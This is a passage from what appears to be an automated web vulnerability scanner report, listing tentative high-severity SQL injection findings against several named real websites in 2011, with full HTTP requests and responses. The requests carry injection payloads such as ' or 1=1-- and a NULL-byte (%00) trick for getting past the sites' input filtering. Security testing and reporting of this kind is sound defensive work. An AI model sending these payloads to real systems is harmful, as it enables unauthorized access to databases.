GET /b%00'/ss/hearstseattlepi/1/H.21/s92442379223648?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A24%206%20300&ce=UTF-8&ns=hearst&g=http%3A//www.seattlepi.com/flashtalking/ftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A//mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26&r=http%3A//www.seattlepi.com/&cc=USD&pageType=errorPage&events=event16&c12=New&v12=New&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=300&bh=250&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295384437-New%7C1318887384437%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:02:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/hearstseattlepi/1/H.21/s92442379223648?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A24%206%20300&ce=UTF-8&ns=hearst&g=http%3A//www.seattlepi.com/flashtalking/ftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A//mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26&r=http%3A//www.seattlepi.com/&cc=USD&pageType=errorPage&events=event16&c12=New&v12=New&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=300&bh=250&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295384437-New%7C1318887384437%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:02:42 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html

1.19. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s94189070519059 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.seattlepi.com
Path:	/b/ss/hearstseattlepi/1/H.21/s94189070519059

Issue detail

Remediation detail

Request 1

GET /b%2527/ss/hearstseattlepi/1/H.21/s94189070519059?AQB=1&ndh=1&t=17/8/2011%2016%3A42%3A7%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; __qca=P0-1682088852-1316295406495; s_pers=%20s_nr%3D1316295727539-New%7C1318887727539%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:26:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hearstseattlepi/1/H.21/s94189070519059 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hearstseattlepi/1/H.21/s94189070519059?AQB=1&ndh=1&t=17/8/2011%2016%3A42%3A7%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; __qca=P0-1682088852-1316295406495; s_pers=%20s_nr%3D1316295727539-New%7C1318887727539%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:26:40 GMT
Server: Omniture DC/2.0.0
xserver: www617
Content-Length: 0
Content-Type: text/html

1.20. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s98951816044282 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.seattlepi.com
Path:	/b/ss/hearstseattlepi/1/H.21/s98951816044282

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/hearstseattlepi%00'/1/H.21/s98951816044282?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A10%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.2.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:06:31 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/hearstseattlepi was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/hearstseattlepi%00''/1/H.21/s98951816044282?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A10%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.2.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:06:31 GMT
Server: Omniture DC/2.0.0
xserver: www596
Content-Length: 0
Content-Type: text/html

1.21. http://syn.verticalacuity.com/varw/getPromo [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://syn.verticalacuity.com
Path:	/varw/getPromo

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10313007'%20or%201%3d1--%20 and 10313007'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /varw/getPromo?conId=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&fp=true&holdout=false&pUrl=http%3A%2F%2Fwww.ugo.com%2F&cb=1316294751737&tOff=-5&seq=1 HTTP/1.1
Host: syn.verticalacuity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=10313007'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 17 Sep 2011 16:32:03 GMT
Server: nginx
Content-Length: 1392
Connection: keep-alive

(function() {
   var BASE_URL = 'http://syn.verticalacuity.com/varw/';
   var dataVar = 'recData' || 'data';
   var data = {"baseUrl":"http://syn.verticalacuity.com/varw/","dataVarName":"recData","d":[],"scripts":[],"styles":[],"siteEnabled":false};

   if(!window.VAData){window.VAData={}}window.VAData.dataVar=dataVar;window.VAData[dataVar]=data;(function(){var e=data.baseUrl;var i=document;var h="head";var b="?cb="+Math.round(new Date().getTime()/3600000);var d=function(j){try{for(var m=0;m<j.length;m++){var n=e+j[m];if(j[m].indexOf("http://")===0||j[m].indexOf("https://")===0){n=j[m]}var k=i.createElement("script");k.type="text/javascript";k.src=n+b;k.defer=true;((i.getElementsByTagName(h))[0]).appendChild(k)}}catch(l){}};var c=function(n){try{for(var l=0;l<n.length;l++){var j=e+n[l];if(n[l].indexOf("http://")===0||n[l].indexOf("https://")===0){j=n[l]}var m=i.createElement("link");m.rel="stylesheet";m.type="text/css";m.media="all";m.href=j+b;((i.getElementsByTagName(h))[0]).appendChild(m)}}catch(k){}};var f=function(){var n=document.domain.split("."),j=n.length,k=n;if(j>=2){var l=n[j-2]+"."+n[j-1];if(n[j-2]=="co"){l=n[j-3]+"."+l}k=l}var m="_vaNP=siteEnabled=false; path=/";m+=k!==null?"; domain="+k:"";i.cookie=m};try{if(data){if(data.siteEnabled==true){c(data.styles);d(data.scripts)}else{f()}}}catch(g){try{log("error","Failure in VAPromo: "+g.message)}catch(a){}}})();
})();

Request 2

GET /varw/getPromo?conId=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&fp=true&holdout=false&pUrl=http%3A%2F%2Fwww.ugo.com%2F&cb=1316294751737&tOff=-5&seq=1 HTTP/1.1
Host: syn.verticalacuity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=10313007'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 17 Sep 2011 16:32:04 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Server: nginx
Set-Cookie: JSESSIONID=wz5uxs7ukadb1jau0zxh73neo;Path=/varw
Content-Length: 1392
Connection: keep-alive

(function() {
   var BASE_URL = 'http://syn.verticalacuity.com/varw/';
   var dataVar = 'recData' || 'data';
   var data = {"baseUrl":"http://syn.verticalacuity.com/varw/","dataVarName":"recData","d":[],"scripts":[],"styles":[],"siteEnabled":false};

   if(!window.VAData){window.VAData={}}window.VAData.dataVar=dataVar;window.VAData[dataVar]=data;(function(){var e=data.baseUrl;var i=document;var h="head";var b="?cb="+Math.round(new Date().getTime()/3600000);var d=function(j){try{for(var m=0;m<j.length;m++){var n=e+j[m];if(j[m].indexOf("http://")===0||j[m].indexOf("https://")===0){n=j[m]}var k=i.createElement("script");k.type="text/javascript";k.src=n+b;k.defer=true;((i.getElementsByTagName(h))[0]).appendChild(k)}}catch(l){}};var c=function(n){try{for(var l=0;l<n.length;l++){var j=e+n[l];if(n[l].indexOf("http://")===0||n[l].indexOf("https://")===0){j=n[l]}var m=i.createElement("link");m.rel="stylesheet";m.type="text/css";m.media="all";m.href=j+b;((i.getElementsByTagName(h))[0]).appendChild(m)}}catch(k){}};var f=function(){var n=document.domain.split("."),j=n.length,k=n;if(j>=2){var l=n[j-2]+"."+n[j-1];if(n[j-2]=="co"){l=n[j-3]+"."+l}k=l}var m="_vaNP=siteEnabled=false; path=/";m+=k!==null?"; domain="+k:"";i.cookie=m};try{if(data){if(data.siteEnabled==true){c(data.styles);d(data.scripts)}else{f()}}}catch(g){try{log("error","Failure in VAPromo: "+g.message)}catch(a){}}})();
})();

1.22. http://www.answerology.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/

Issue detail

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:27 GMT
Content-Length: 58819
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:27 GMT
Content-Length: 58840
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.23. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/cosmogirl/CosmogirlLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

